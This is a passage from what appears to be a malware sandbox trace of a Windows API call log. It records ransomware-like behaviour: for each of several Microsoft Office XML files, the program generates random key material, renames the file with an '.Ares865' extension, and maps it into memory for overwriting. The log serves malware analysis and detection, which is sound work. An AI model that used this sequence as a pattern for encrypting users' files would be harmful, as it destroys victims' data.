hTemplateFile=0x0) returned 0x164 [0067.651] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7612) returned 1 [0067.651] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.652] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.652] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.652] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20c0, lpName=0x0) returned 0x120 [0067.659] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x20c0) returned 0x190000 [0067.660] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.662] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.662] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.662] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML.Ares865") returned 70 [0067.662] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebpqt.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebpqt.xml.ares865"), dwFlags=0x1) returned 1 [0067.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBPQT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebpqt.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.663] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3004) returned 1 [0067.663] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.664] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.664] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.664] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xec0, lpName=0x0) returned 0x120 [0067.666] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xec0) returned 0x190000 [0067.666] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.667] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.667] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.668] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML.Ares865") returned 70 [0067.668] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebref.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebref.xml.ares865"), dwFlags=0x1) returned 1 [0067.669] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBREF.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebref.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.669] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=544) returned 1 [0067.669] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.670] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.670] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.670] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x520, lpName=0x0) returned 0x120 [0067.672] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x520) returned 0x190000 [0067.673] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.674] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML.Ares865") returned 70 [0067.674] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebsbr.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebsbr.xml.ares865"), dwFlags=0x1) returned 1 [0067.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBSBR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebsbr.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.675] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=3004) returned 1 [0067.675] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.676] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.676] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.676] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xec0, lpName=0x0) returned 0x120 [0067.677] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xec0) returned 0x190000 [0067.678] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.679] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.679] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.679] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML.Ares865") returned 68 [0067.679] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgzipc.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgzipc.xml.ares865"), dwFlags=0x1) returned 1 [0067.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGZIPC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgzipc.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.680] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=214) returned 1 [0067.680] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.681] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.681] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.681] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e0, lpName=0x0) returned 0x120 [0067.683] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e0) returned 0x190000 [0067.684] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.685] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.685] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.685] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML.Ares865") returned 67 [0067.685] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email.xml.ares865"), dwFlags=0x1) returned 1 [0067.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\EMAIL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\email.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.687] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=53350) returned 1 [0067.687] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.688] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.688] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.688] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd370, lpName=0x0) returned 0x120 [0067.689] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd370) returned 0x190000 [0067.692] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.694] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML.Ares865") returned 70 [0067.694] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envelope.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envelope.xml.ares865"), dwFlags=0x1) returned 1 [0067.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\ENVELOPE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\envelope.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.695] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=12510) returned 1 [0067.695] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.696] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.696] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.696] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33e0, lpName=0x0) returned 0x120 [0067.698] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33e0) returned 0x190000 [0067.699] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.700] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.700] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.700] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML.Ares865") returned 67 [0067.700] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer.xml.ares865"), dwFlags=0x1) returned 1 [0067.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FLYER.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\flyer.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.701] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=81276) returned 1 [0067.701] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.702] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.702] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.702] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14080, lpName=0x0) returned 0x120 [0067.704] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14080) returned 0x190000 [0067.707] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.708] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.708] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.710] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML.Ares865") returned 70 [0067.710] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\foldproj.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\foldproj.xml.ares865"), dwFlags=0x1) returned 1 [0067.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FOLDPROJ.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\foldproj.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.722] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1580) returned 1 [0067.722] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.723] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.723] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.723] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x930, lpName=0x0) returned 0x120 [0067.727] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x930) returned 0x190000 [0067.728] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.728] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.728] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.729] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML.Ares865") returned 66 [0067.729] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift.xml.ares865"), dwFlags=0x1) returned 1 [0067.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GIFT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\gift.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.731] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5320) returned 1 [0067.731] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.731] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.731] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.732] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17d0, lpName=0x0) returned 0x120 [0067.733] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17d0) returned 0x190000 [0067.734] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.735] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.735] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.735] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML.Ares865") returned 70 [0067.735] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greeting.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greeting.xml.ares865"), dwFlags=0x1) returned 1 [0067.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\GREETING.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\greeting.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.737] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=64268) returned 1 [0067.737] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.738] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.738] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.738] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfe10, lpName=0x0) returned 0x120 [0067.739] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfe10) returned 0x190000 [0067.742] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.743] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.743] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.744] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML.Ares865") returned 68 [0067.745] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite.xml.ares865"), dwFlags=0x1) returned 1 [0067.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\INVITE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\invite.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.746] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=18886) returned 1 [0067.746] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.747] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.747] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.747] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4cd0, lpName=0x0) returned 0x120 [0067.748] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4cd0) returned 0x190000 [0067.749] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.750] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.750] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.751] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML.Ares865") returned 67 [0067.751] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label.xml.ares865"), dwFlags=0x1) returned 1 [0067.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LABEL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\label.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.755] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=18630) returned 1 [0067.755] 